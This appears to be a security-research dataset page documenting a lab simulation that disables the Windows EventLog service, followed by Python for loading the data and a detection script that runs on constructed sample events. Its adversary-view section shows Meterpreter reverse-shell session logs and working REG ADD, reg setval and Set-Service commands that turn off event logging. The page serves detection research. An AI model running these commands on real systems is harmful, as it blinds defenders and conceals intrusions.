Stopping Event Log Service via Modification of Start Up Type
Metadata

| Field | Value |
|---|---|
| Contributors | Jose Rodriguez @Cyb3rPandaH |
| Creation Date | 2022/07/08 |
| Modification Date | 2022/08/04 |
| Tactics | |
| Techniques | |
| Tags | powershell, reg, cmd, eventlog |
Dataset Description

After getting a shell with elevated privileges on the target, we modified the startup type of the EventLog service to Disabled. After the modification, the system needs to be restarted for the EventLog service to become unavailable (Disabled). This dataset contains only the before-reboot data of our simulation. Even though after-reboot data is not part of the dataset, our attempt to disable the EventLog service was successful during the simulation. We simulated this attack using 3 different procedures: the REG command via cmd.exe, the REG meterpreter command (Metasploit), and the PowerShell module (Metasploit). This dataset was generated using a Windows 10 Pro Evaluation edition (Version: 1903, OS Build: 18362.30) and Kali Linux (Version: 2022.2).
Datasets Downloads

| Type | Link |
|---|---|
| Host | |
| Host | |
| Host | |
Adversary View

Using reg command via cmd.exe:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: jhdxsqpv) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 20 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:20:26 -0400
meterpreter > shell
Process 7728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\IT01-Pedro\Downloads>REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog /t REG_DWORD /v Start /d 4
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog /t REG_DWORD /v Start /d 4
Value Start exists, overwrite(Yes/No)? yes
The operation completed successfully.
C:\Users\IT01-Pedro\Downloads>
Using reg meterpreter command:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: r64afjpx) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 19 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 10:50:58 -0400
meterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog' -v 'Start' -t 'REG_DWORD' -d 4
Successfully set Start of REG_DWORD.
meterpreter >
Using PowerShell module:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: bgwdtwdi) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 21 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:36:38 -0400
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute "Set-Service -Name EventLog -StartUpType Disabled"
[+] Command execution completed:
meterpreter >
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# The URL must be a string literal; the original line was missing the quotes.
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_disable_eventlog_service_startuptype_modification.zip'
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the first (and only) member, the JSON-lines file, and keep its path
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```
Read JSON File

```python
import pandas as pd

# The dataset is newline-delimited JSON (one event per line), hence lines=True
df = pd.read_json(datasetJSONPath, lines=True)
```
Access Security Events

```python
df.groupby(['Channel']).size().sort_values(ascending=False)
```
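As an added example (not part of the original dataset page), the following detection pass flags the three procedures shown in the Adversary View from the JSON-lines events: a Sysmon Event ID 13 setting `...\Services\EventLog\Start` to `4` (REG ADD and meterpreter `reg setval`), and Service Control Manager 7040 in the System log (the `Set-Service` path). The field names `Channel`, `EventID`, `TargetObject`, `Details`, `Image`, `Hostname` and `Message` are assumed to follow the OTRF Sysmon/Windows schema, and the sample events are constructed, not taken from the dataset.

```python
import json
import re

# Field names (Channel, EventID, TargetObject, Details, Image, Hostname, Message) are assumed
# to follow the Sysmon/Windows schema used in OTRF Security-Datasets JSON lines.
SYSMON = "Microsoft-Windows-Sysmon/Operational"
START_DISABLED = "DWORD (0x00000004)"  # Start=4 is SERVICE_DISABLED
EVENTLOG_START = re.compile(r"\\Services\\EventLog\\Start$", re.IGNORECASE)

def is_eventlog_disable(event):
    """True if the event records the EventLog service start type being set to Disabled."""
    channel, event_id = event.get("Channel", ""), event.get("EventID")
    # Sysmon 13 (RegistryEvent value set): catches REG ADD, meterpreter reg setval and Set-Service
    if channel == SYSMON and event_id == 13:
        return (EVENTLOG_START.search(event.get("TargetObject", "")) is not None
                and event.get("Details", "") == START_DISABLED)
    # SCM 7040 in the System log: start type changed through the service API (Set-Service path)
    if channel == "System" and event_id == 7040:
        msg = event.get("Message", "")
        return "Windows Event Log" in msg and "disabled" in msg.lower()
    return False

def find_eventlog_disable(jsonl_text):
    """Parse JSON-lines text and return (Hostname, EventID, Image) for each matching event."""
    hits = []
    for line in jsonl_text.splitlines():
        if line.strip():
            ev = json.loads(line)
            if is_eventlog_disable(ev):
                hits.append((ev.get("Hostname"), ev["EventID"], ev.get("Image", "")))
    return hits

# Constructed sample events (not from the dataset) covering the three procedures plus noise.
KEY = "HKLM\\System\\CurrentControlSet\\Services\\EventLog\\Start"
SAMPLE = "\n".join(json.dumps(e) for e in [
    {"Channel": SYSMON, "EventID": 13, "Hostname": "WORKSTATION5", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": KEY, "Details": START_DISABLED},                      # REG ADD / reg setval
    {"Channel": SYSMON, "EventID": 13, "Hostname": "WORKSTATION5", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": KEY, "Details": START_DISABLED},                      # Set-Service via the SCM (assumed image)
    {"Channel": "System", "EventID": 7040, "Hostname": "WORKSTATION5",
     "Message": "The start type of the Windows Event Log service was changed from auto start to disabled."},
    {"Channel": SYSMON, "EventID": 13, "Hostname": "WORKSTATION5", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\Start", "Details": START_DISABLED},  # other service
])

if __name__ == "__main__":
    for hit in find_eventlog_disable(SAMPLE):
        print(hit)
```

Because the dataset only holds before-reboot data, these events are the earliest signal available; after a reboot the service is no longer logging, so the alert has to fire on the modification itself.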